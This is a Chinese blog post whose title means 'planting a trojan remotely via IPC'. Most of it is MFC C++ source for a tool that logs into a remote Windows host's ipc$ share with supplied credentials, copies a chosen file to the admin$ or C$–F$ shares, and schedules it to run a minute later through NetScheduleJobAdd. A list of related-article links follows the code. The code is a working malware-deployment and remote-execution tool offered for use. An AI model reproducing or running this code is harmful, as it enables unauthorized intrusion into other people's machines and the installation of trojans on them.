远程IPC种植木马
远程 木马 IPC
2023-09-11 14:14:05 时间
要实现代码如下:
/////////////////////////////////////////////////////////////////////////////////////
typedef struct TagHost
{
CString host;
CString user;
CString pass;
CString filename;
CString LocalFilePath;
CListBox* list;
}IPC;
void CShareDlg::OnStart() //启动线程序
{
UpdateData(TRUE);
IPC* ipc = new IPC;
ipc->host = m_host;
ipc->user = m_user;
ipc->pass = m_pass;
ipc->LocalFilePath = m_localfile;
ipc->filename = filename;
ipc->list = &m_list;
AfxBeginThread(ThreadIpcConnect,ipc);
}
/////////////////////////////线程/////////////////////////////////////////////////////
UINT ThreadIpcConnect(LPVOID lpvoid)
{
IPC* ipc;
CListBox* list;
ipc = (IPC*)lpvoid;
CString host;
CString admin;
CString pass;
CString filename;
CString localfilepath;
host = ipc->host ;
pass = ipc->pass;
admin = ipc->user;
localfilepath = ipc->LocalFilePath;
filename =ipc->filename ;
list = ipc->list;
BOOL IpcConnect;
LPTIME_OF_DAY_INFO TimeBuf=NULL;
NET_API_STATUS Status;
CString RemoteFilePath,CmdCom("admin$\");
///////////////////////////////IPC连接////////////////////////////////////////////////////////////////
NETRESOURCE ns;
TCHAR buf[MAX_PATH];
wsprintf(buf,"\\%s\ipc$",host);
ZeroMemory(&ns,sizeof(ns));
ns.dwScope=RESOURCE_GLOBALNET;
ns.dwType=RESOURCETYPE_ANY;
ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;
ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;
ns.lpLocalName="";
ns.lpRemoteName=buf;
ns.lpProvider=NULL;
ns.lpComment=NULL;
CString hhost = host;
IpcConnect =WNetAddConnection2(&ns,pass,admin,0);
///建立IPC连接
if(IpcConnect)
{
//连接成功后
///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////
RemoteFilePath=("\\"+host+"\admin$\"+filename);
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
//复制文件到admin$(winnt) 如果复制失败,,向其他共享区复制
if(!IpcConnect)
{
RemoteFilePath=("\\"+host+"\C$\"+filename);
CmdCom="C:\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath=("\\"+host+"\D$\"+filename);
CmdCom="D:\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath=("\\"+host+"\E$\"+filename);
CmdCom="E:\"+filename;
IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
if(!IpcConnect)
{
RemoteFilePath ("\\"+host+"\F$\"+filename);
CmdCom = "F:\"+filename;
IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);
}
}
}
}
///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////
if(IpcConnect)
{//获取远程主机时间
Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);
if(Status==NERR_Success)
{//活取时间成功
///////////////////////////启动目标文件///////////////////////////////////////////////////////////////
DWORD day=1,JobTime;
AT_INFO ai;
day=day*2;
ai.Command=CmdCom.AllocSysString();
ai.DaysOfMonth=day;
ai.DaysOfWeek=0;
ai.Flags=JOB_NONINTERACTIVE;
ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;
Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);
//启动上传的文件,一分钟后启动
if(Status==NERR_Success)
{
list->AddString(host+"启动成功");
}
else
list->AddString(host+"启动失败");
}
else
{
list->AddString(host+"获取时间失败");
}
}
else
{
list->AddString(host+"复制文件失败");
}
}
else
list->AddString(host+"连接失败");
return TRUE;
}
相关文章
- C#远程调用技术WebService葵花宝典
- ssh连接远程主机执行脚本的环境变量问题
- GBT32960-2016电动汽车远程服务与管理系统技术规范 第3部分:通信协议及数据格式
- 利用Python来远程控制肉鸡自由操作,下一个黑客大佬就是你
- ssh Forward X11 实现远程主机GUI在本地展示 (C/S X)
- Atitit.远程接口 监控与木马 常用的api 标准化v2 q216
- 22 - vulhub - Fastjson 1.2.47 远程命令执行漏洞
- [手游新项目历程]-46-远程访问 Teamview
- 远程debug
- jconsole连接远程tomcat
- git中如何获取远程仓库的最新代码?
- 【项目实战】Springboot工程整合Dubbo框架,实现RPC远程调用
- 【Git技巧】第十一篇 更新远程分支列表
- 2023年中职网络安全竞赛服务远程控制任务解析
- Postgresql 12.9如何配置允许远程连接